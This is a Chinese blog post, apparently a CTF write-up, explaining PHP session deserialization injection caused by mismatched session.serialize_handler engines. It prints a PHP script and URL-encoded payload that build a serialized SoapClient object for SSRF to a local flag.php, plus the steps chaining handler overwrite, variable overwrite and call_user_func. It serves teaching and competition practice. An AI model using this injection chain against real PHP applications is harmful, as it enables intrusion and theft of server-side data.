SESSION反序列化

最新推荐文章于 2023-12-13 18:37:38 发布
最新推荐文章于 2023-12-13 18:37:38 发布
阅读量837 收藏
点赞数 1
分类专栏: 安全 CTF 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/124024092
版权
安全 同时被 2 个专栏收录
23 篇文章 2 订阅
订阅专栏
CTF
18 篇文章 0 订阅
订阅专栏

SESSION反序列化

session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }
only localhost can get flag!

看到这个 首先想到SSRF去访问flag.php,然后获得flag,再利用变量覆盖把session中的flag打印出来
php中的seiion中的内容并不是放在内存中的,而是以文件的方式来存储的,存储的方式就是由配置项session_save_handler来进行确定的,默认是以文件的方式存储。
存储的文件是以sess_sessionid来进行命名的,文件的内容就是session值的序列话之后的内容
在php.ini中存在三项配置项:

session.save_path=""   --设置session的存储路径
session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.serialize_handler   string --定义用来序列化/反序列化的处理器名字。默认是php(5.5.4后改为php_serialize)

session.serialize_handler存在以下几种

php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
php 键名+竖线(|+经过serialize()函数处理过的值
php_serialize 经过serialize()函数处理过的值,会将键名和值当作一个数组序列化

在PHP中默认使用的是PHP引擎,如果要修改为其他的引擎,只需要添加代码ini_set(‘session.serialize_handler’, ‘需要设置的引擎’);。
php_binary引擎格式

<0x04>names:5:"Smi1e";

php引擎格式

name|s:5:"Smi1e";

php_searialize引擎格式

a:1:{s:4:"name";s:5:"Smi1e";}

当序列化的引擎和反序列化的引擎不一致时,就可以利用引擎之间的差异产生序列化注入漏洞。
例如传入

$_SESSION['name']='|O:5:"Smi1e":1:{s:4:"test";s:3:"AAA";}';

序列化引擎使用的是php_serialize,那么储存的session文件为

a:1:{s:4:"name";s:5:"|O:5:"Smi1e":1:{s:4:"test";s:3:"AAA";}";}

而反序列化引擎如果使用的是php,就会把|作为作为key和value的分隔符。把a:1:{s:4:“name”;s:5:"当作键名,而把O:5:“Smi1e”:1:{s:4:“test”;s:3:“AAA”;}当作经过serialize()函数处理过的值,最后会把它进行unserialize处理,此时就构成了一次反序列化注入攻击。

请添加图片描述
回归本题:
**题目中的源码并没有类,因此只能去利用php的原生类。
利用回调函数覆盖session序列化引擎为php_serilaze,构造SSRF的Soap类的序列化字符串配合序列化注入写入session文件,然后利用变量覆盖漏洞,覆盖掉变量b为回调函数call_user_func,此时结合我刚开始所说的回调函数调用Soap类的未知方法,触发__call方法进行SSRF访问flag.php。把flag写入session,再把session打印出来

session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
       $_SESSION['flag'] = $flag;
   }
only localhost can get flag!

构造SSRF的Soap类的序列化字符串

<?php
$url = "http://127.0.0.1/flag.php";
$b = new SoapClient(null, array('uri' => $url, 'location' => $url));
$a = serialize($b);
$a = str_replace('^^', "\r\n", $a);
echo "|" . urlencode($a);
?>**

得到的payload

|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

覆盖序列化引擎并将构造的Soap类序列化字符串写入session文件。
在这里插入图片描述
这里session_start()序列化使用的是php引擎,然后就是进行变量覆盖b,利用call_user_func调用SoapClient类中的不存在方法,触发__call方法,执行ssrf。并获得访问flag.php的PHPSESSID
在这里插入图片描述

call_user_func函数
这是一个回调函数,这个函数把第一个参数作为回调函数调用,第一个参数是被调用的回调函数,其余参数是回调函数的参数,这里调用的回调函数不仅仅是我们自定义的函数,还可以是php的内置函数,

<?php
class myclass{
    static function say_hello(){
        echo "hello!";
    }
}
$classname = "myclass";
call_user_func(array($classname,'say_hello'));

这个结果就会调用myclass中的say_hello方法,输出hello

获得的PHPSESSID的SESSION
在这里插入图片描述

H0ne
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF学习(4)Gopher协议POST请求
m0_64417923的博客
05-13 1130
和前两题一样,先使用file:///协议 http://127.0.0.1/flag.php 得到一个输入框 右键查看源代码: 得到key key=f80bb4e68df72b3f98569b958219be05 所以应该是通过key进入,从而得到flag,但是没有提交的按钮,所以我们要自己构造post请求,将这个key发送过去。 用gopher协议构造post请求: <?php ​ error_reporting(0); ​ if ($_SERVER["REM...
深入解析PHPSESSION反序列化机制
10-20
主要介绍了PHPSESSION反序列化机制的相关资料,文中介绍的非常相信,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
bestphp‘s revenge 1
m0_62129839的博客
02-20 151
因为$b变量已经被我们覆盖成了call_user_func,那么此时的程序,就变成了call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));9. $_session这个对象,会去调用“welcome_to_the_lctf2018”这个不存在的方法,于是__call方法被。
[LCTF 2018]bestphp‘s revenge
rev1ve的博客
12-13 1049
即达到session_start(array(‘serialize_handler’ => ‘php_serialize’)) ,将会根据php7特性设置session.serialize_handler=php_serialize。思路就是利用SoapClient 类构造出ssrf的序列化字符串,然后利用call_user_func修改配置,造成序列化与反序列化引擎不同的漏洞,然后调用extract函数去变量覆盖,调用SoapClient类,从而触发__call 方法。
SSRF学习 2
weixin_63231007的博客
05-21 815
[CTFHub]ssrf 上传文件&Fastcgi&Redis&bypass
ctf刷题记录
enhengzZ的博客
04-23 1335
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Web应用软件的基于Java的Web应用软件容器。0x02 漏洞概述这次是由于错误配置和 org.apache
银河麒麟服务器操作系统Tomcat Session 反序列化代码执行漏洞(CVE-2020-9484)修复补丁
最新发布
03-14
亲测有效,可能还需要其他环境,可在我个人发布里看
session反序列化
weixin_45782091的博客
03-25 3722
session反序列化的漏洞是由三种不同的反序列化引擎所产生的的漏洞 其中 session.serialize_handler string--定义用来序列化/反序列化的处理器名字。默认使用php 若使用如下设置: <?php //ini_set('session.serialize_handler', 'php'); //ini_set("session.serialize_handler", "php_serialize"); ini_set("session.serialize_handle
session反序列化原理
yggcwhat
12-13 667
前言 看了好多session反序列化的文章,发现都有点晦涩难懂,关键的原理地方都没说清楚,所以我就索性写一篇,供各位师傅一起学习。 导读 什么是session?其实就是服务器为了保存用户状态而创建的一个保存用户信息的特殊对象,是存储在服务端的,有session那肯定就有sessionid了,他是怎么来的?当我们浏览器第一次访问服务器时,服务器创建一个session对象并且该对象有一个唯一的id,叫做sessionId,服务器会将sessionid以cookie的方式发送给浏览器,当浏览器再次访问服务器
bestphp‘s revenge/ 安洵杯Babyphpphpsession题目)
qq_62046696的博客
11-30 1001
改变phpsessionid为我们编写代码的那个值就可以获得flag大概思路是这样,等题目上平台,再复现。
session的序列化、反序列化session的活化、钝化
刘伟佳的博客
11-21 1008
一、session的序列化和反序列化 序列化 一般来说,服务器启动后,就不会再关闭了,但是如果逼不得已需要重启,而用户会话还在进行相应的操作,这时就需要使用序列化将session信息保存起来放在硬盘,服务器重启后,又重新加载。这样就保证了用户信息不会丢失,实现永久化保存。 我们举个例子演示一下: 比如我们新建一个项目,放入两个简单的jsp, a.jsp <body> <h1&g...
PHP session反序列化漏洞
weixin_39664643的博客
03-14 5366
PHP session反序列化漏洞 PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器端 session通常是要配合cookie使用 因为HTTP的无状态性,服务端产生了session来标识当前
BUU刷题记录——3
weixin_43610673的博客
08-31 781
[SWPUCTF 2018]SimplePHP 可以上传到找不到上传的文件 http://05de1970-8bf0-44cd-ba69-44dd2d41c86a.node3.buuoj.cn/file.php?file=upload_file.php 直接就可以从?file读源码,还用伪协议试了半天不行。。。 先看下function.php的内容 看源码得知上传的文件在/upload/目录下 文件名只能是几种图片格式 主要代码在class.php <?php class
HGAME-WEEK1-WRITE-UP
郁离歌丶的博客
03-07 1399
HGAME-WEEK1WEB1、Are you from Europe?解法一:查看源码,然后看到抽到SSR概率太低了吧,直接控制台执行var SSR=100000000;然后疯狂氪金。var money=100000000;抽几次奖拿到flag。解法二:审查元素,发现以下代码:eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?"":e(...
ctf GetFlag
cs_xiaoqiang的博客
01-18 5942
今天好不容易将这道题做出来了,来与大家分享分享。题目如下:访问连接:   http://106.75.26.211:2222   先查看源码,没有任何发现。但是在页面上发现一个登陆窗口,跳转到登陆窗口。并且发现验证码是纯数字的md5的值取最前面的6位,那么可以自己写一个脚本来跑 有了验证码之后,本来是准备尝试爆破的。可是发现每访问一次验证码都会改变,所以这条路明显行不通。经过多次的尝试之后发现登陆
session对象序列化
04-29
在Python中,可以使用pickle模块对Session对象进行序列化和反序列化。示例如下: ```python import pickle # 将Session对象序列化为字节流 serialized_session = pickle.dumps(session_object) # 将字节流反序列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值